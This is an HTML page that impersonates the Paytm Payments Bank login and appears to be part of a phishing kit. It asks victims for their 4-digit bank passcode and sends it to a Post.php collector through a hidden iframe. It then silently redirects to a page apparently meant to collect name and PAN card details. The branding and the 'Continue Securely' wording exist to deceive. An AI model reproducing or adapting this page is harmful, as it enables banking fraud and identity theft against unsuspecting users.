<!DOCTYPE html>
<html lang="eng">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <link rel="apple-touch-icon" sizes="180x180" href="/Paytm/apple-touch-icon.png">
 <link rel="icon" type="image/png" sizes="32x32" href="/Paytm/favicon-32x32.png">
 <link rel="icon" type="image/png" sizes="16x16" href="/Paytm/favicon-16x16.png">
 <link rel="manifest" href="/Paytm/site.webmanifest">
  <meta name="msapplication-TileColor" content="#da532c">
  <meta name="theme-color" content="#ffffff">
  <title>Paytm login - Passcode</title>
  <style>
    #ml
    {
      width:40%;
      margin-left:150px;
      position:absolute;
      top:14px;
    }
    #tp
    {
    width: 295px;
    height: 35px;
    background-color: white;
    border-color:#01B9F5;
    color:#404145;
    font-size: 15px !important;
    line-height: 25px !important;
    font-weight:bold;
    padding: 1px 5px;
    margin-bottom:10px;
    margin-left:18px;
    outline: none;
    background:none;
    box-shadow: 0px 2px 0px #DADADA;
    border:none;
   }
   #tp:hover
   {
   box-shadow: 0px 2px 0px #00B1F1
   
   }
    #btn
    {
    width:170px;
    background-color:#01B9F5;
    color: white;
    border: solid black;
    border-radius: 2px;
    border-width: 0px;
    font-weight: bold;
    cursor: pointer;
    font-size: 15px;
    height:36px;
    }
    #ab
    {
    width:358px;
    margin:50px;
    border-bottom:solid #E6E6E6;
    border-width:1.2px;
    }
    #dont
    {
    width:200px;
    background-color:white;
    color: red;
    border: solid red;
    margin-left:122px;
    border-radius: 2px;
    border-width: 1px;
    font-weight: bold;
    font-size: 14px;
    height:22px;
    }
    input::-webkit-input-placeholder {
    color: #CCCCCC;
    font-weight:bold;
    }
    input:-moz-placeholder {
    color: #CCCCCC;
    font-weight:bold;
    }
    input::-moz-placeholder {
    color: #CCCCCC;
    font-weight:bold;
    }
    input:-ms-input-placeholder {
    color: #CCCCCC;
    font-weight:bold;
    }
    </style>
    </head>
    <body onload="startTimer();">
    <!-- Static- Please don't do anything here-->
    <script type="text/javascript">var submitted=false;</script>
    <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Name_And_PAN_Card.html';}"></iframe>
    <!--My Form-->
    <form action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
    <div class="line">
    <b style="font-family:arial; font-size:25px; color:black; margin-left:50px;
    position:absolute;
    top:14px;">Login to</b></div>
    <img src="pbank.png" alt="" id="ml"><br><br>
    <div id="ab" 
    style="margin:10px; 
    margin-left:-8px;">
    </div><br><br>
    <div>
    <center><b style="font-family:arial; font-size:18px; color:black; margin-left:20px;">Enter Payments Bank Passcode</b></center><br>
    </div>
    <b style="font-family:arial; font-size:15px; color:#01B9F5; margin-left:20px;">Paytm Payments Bank 4 Digit Passcode</b><br>
    <input type="text" inputmode="numeric" name="Passcode" id="tp" placeholder="Enter 4 digit passcode" 
    maxlength="4" pattern="[0-9]{4}" 
    title="Please enter valid passcode"
    required=""><br>
    <div id="">
    <button id="dont" onclick="location.href='Name_And_PAN_Card.html'" type="button">I don't have Payments Bank !</button>
    <!--<b style="color: #01B9F5; font-size:14px; font-family: Arial, Helvetica, sans-serif; margin-left:142px;"> <a href="PaytmSelfie.html" style=" color:red; font-family: Arial, Helvetica, sans-serif; text-decoration:none;">I don't have Payments Bank !</a></b>
    --></div><br>
    <center><button type="submit" id="btn" style="font-weight:bold;">Continue Securely</button></center><br>
    <b style="color:#01B9F5; font-size:15px; font-family: Arial, Helvetica, sans-serif; margin-left:20px;">Know more about Passcode authentication</span></b><br>
    <i style="color:grey; font-size:15px; font-weight:bold;margin-left:20px;">Having trouble logging in ?</i>
     <span style="color: #01B9F5; font-weight:bold;"><i style="font-size:15px; font-weight:bold;">Contact us</i></span>
     </form></body></html>